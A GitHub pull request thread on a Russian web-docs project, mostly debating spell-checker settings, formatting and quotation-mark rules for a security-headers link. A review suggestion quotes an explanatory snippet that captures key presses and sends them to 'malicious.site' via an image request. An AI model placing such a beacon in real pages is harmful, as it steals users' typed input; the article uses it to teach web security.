Добавляет ссылку на статью о security-заголовках
doka-guide/content pull request #1108
Opened 2021-07-06 12:54 UTC by bespoyasov

2021-07-06 12:57 UTC, bespoyasov commented
А как спеллеру объяснить, что это не баг, а фича?

<img width="358" alt="«Screenshot» 2021-07-06 at 15 57 18" src="https://user-images.githubusercontent.com/9102374/124603690-db312080-de72-11eb-9701-2b5bc7ed2bdb.png">

<img width="710" alt="«Screenshot» 2021-07-06 at 15 56 52" src="https://user-images.githubusercontent.com/9102374/124603635-cd7b9b00-de72-11eb-8bf3-6f3c705593dd.png">

2021-07-06 20:52 UTC, pepelsbey commented
@bespoyasov есть [дока по спеллеру](https://github.com/doka-guide/content/blob/main/docs/speller.md)

2021-07-07 06:26 UTC, bespoyasov commented
Спасибо!

2021-07-07 07:02 UTC, pepelsbey requested changes
Я бы убрал правки, нерелевантные задаче :)

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
```suggestion
Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье «[Security Headers](https://web.dev/security-headers/)».
```

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +  desktop: "images/cover.png"
```suggestion
  desktop: 'images/cover.png'
```

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +  const data = { ...user, key: e.key };
```suggestion
  const data = { ...user, key: e.key }
```

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +  const params = new URLSearchParams();
```suggestion
  const params = new URLSearchParams()
```

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +});
```suggestion
  new Image().src = "https://malicious.site?data=" + encodeURIComponent(params)
})
```

2021-07-07 07:02 UTC, pepelsbey commented on js/web-security/index.md
> +  <input type="hidden" name="CSRF" value="token-generated-by-server" />
```suggestion
  <input type="hidden" name="CSRF" value="token-generated-by-server">
```

2021-07-07 07:19 UTC, bespoyasov commented
Это всё Prettier :–/

2021-07-07 07:20 UTC, bespoyasov commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
Вот тут не согласен: с английским текстом лучше использовать английские кавычки, ёлочки — с русским.

2021-07-07 08:04 UTC, pepelsbey commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
А что делать со статьёй **Apple анонсировала новый телефон**, так что ли? :)

> “Apple анонсировала новый телефон»

Кавычки должны быть сквозными для текста. Исключение — цитаты. Правда, @tachisis?

2021-07-07 08:08 UTC, bespoyasov commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
> что делать?

Как вариант — перефразировать: «Компания Apple представила новый телефон».

Ждём вердикт @tachisis.

2021-07-07 08:11 UTC, pepelsbey commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
Вряд ли можно перефразировать название чужой статьи 🤔

2021-07-08 08:04 UTC, pepelsbey approved these changes

2021-07-08 17:58 UTC, tachisis commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
Грамота говорит, что названия, написанные латиницей, не берутся в кавычки.

2021-07-08 17:59 UTC, bespoyasov commented on js/web-security/index.md
> +Больше примеров HTTP-заголовков для настроек безопасности и их использования можно найти в статье [“Security Headers”](https://web.dev/security-headers/).
Неожиданный поворот для всех 😃

2021-07-09 13:05 UTC, pepelsbey approved these changes

2021-07-09 14:26 UTC, pepelsbey approved these changes

2021-07-09 14:26 UTC, merged

2021-07-09 14:27 UTC, pepelsbey commented
Дерзнул смёржить, чтобы в main не было ошибок спеллера.